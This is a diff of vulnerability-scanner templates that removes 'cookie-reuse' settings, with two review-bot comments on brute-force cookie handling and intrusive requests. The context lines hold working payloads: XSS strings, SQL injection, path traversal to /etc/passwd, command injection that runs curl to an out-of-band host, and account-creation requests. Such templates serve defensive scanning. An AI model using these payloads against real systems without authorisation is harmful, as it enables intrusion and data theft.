host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -56,7 +56,6 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
redirects: true
|
redirects: true
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
|
GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -63,7 +63,6 @@ http:
|
||||||
- root
|
- root
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
|
GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
|
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
|
|
||||||
date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
|
date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -37,7 +37,6 @@ http:
|
||||||
|
|
||||||
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -55,7 +55,6 @@ http:
|
||||||
GET /pages/{{randstr}}.jsp HTTP/1.1
|
GET /pages/{{randstr}}.jsp HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -49,7 +49,6 @@ http:
|
||||||
|
|
||||||
album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -47,7 +47,6 @@ http:
|
||||||
|
|
||||||
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
|
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -47,7 +47,6 @@ http:
|
||||||
|
|
||||||
{"name": "internal", "online": "true", "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"}, "group": {"memberNames": ["$\\A{3*3333}"]}}
|
{"name": "internal", "online": "true", "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"}, "group": {"memberNames": ["$\\A{3*3333}"]}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
|
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
|
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -35,7 +35,6 @@ http:
|
||||||
|
|
||||||
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
|
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -76,7 +76,6 @@ http:
|
||||||
|
|
||||||
user={{username}}&pass={{password}}&sublogin=1
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
|
@ -65,7 +65,6 @@ http:
|
||||||
|
|
||||||
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -31,7 +31,6 @@ http:
|
||||||
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1'
|
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1'
|
||||||
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
|
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -63,7 +63,6 @@ http:
|
||||||
|
|
||||||
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -46,7 +46,6 @@ http:
|
||||||
|
|
||||||
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -54,7 +54,6 @@ http:
|
||||||
password:
|
password:
|
||||||
- admin
|
- admin
|
||||||
attack: pitchfork
|
attack: pitchfork
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
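Review bot: This credential-list request (`attack: pitchfork` with a `password:` list) shares one cookie jar across attempts wherever the engine reuses cookies by default, so a session set by one accepted pair could ride along with the next pair and make it look accepted too. If the payload lists hold more than one pair, I would put `disable-cookie: true` where `cookie-reuse: true` stood so each attempt is evaluated on its own. The payload lists and the DSL matcher continue outside the hunk, so the number of pairs and what the matcher keys on are not visible here.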
||||||
|
|
|
@ -36,7 +36,6 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -39,7 +39,6 @@ http:
|
||||||
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
|
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
|
|
||||||
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -37,7 +37,6 @@ http:
|
||||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -50,7 +50,6 @@ http:
|
||||||
GET /{{string}} HTTP/1.1
|
GET /{{string}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /public/css/{{randstr}}.css HTTP/1.1
|
GET /public/css/{{randstr}}.css HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
|
|
||||||
tab=checkuser&username=admin
|
tab=checkuser&username=admin
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -39,7 +39,6 @@ http:
|
||||||
GET /ext-js/index.html HTTP/1.1
|
GET /ext-js/index.html HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -46,7 +46,6 @@ http:
|
||||||
|
|
||||||
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
|
|
||||||
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -46,7 +46,6 @@ http:
|
||||||
|
|
||||||
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
|
|
||||||
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
|
|
||||||
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
|
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
|
|
||||||
searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
|
searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -64,7 +64,6 @@ http:
|
||||||
|
|
||||||
<clipermission></clipermission>
|
<clipermission></clipermission>
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: body
|
part: body
|
||||||
|
|
|
@ -51,7 +51,6 @@ http:
|
||||||
|
|
||||||
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
|
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
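Review bot: The `action=add_new_instructor` request creates a real account on the scanned site, and nothing in this hunk tells an operator that the template changes target state. If the info block, which is outside the hunk, does not already say so, I would add the `intrusive` tag and a comment above the request such as `# creates an instructor account on the target; remove it after verification`. The two hunks that post `tree_path=test.txt&content=test` also write to the target and deserve the same marker.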
||||||
|
|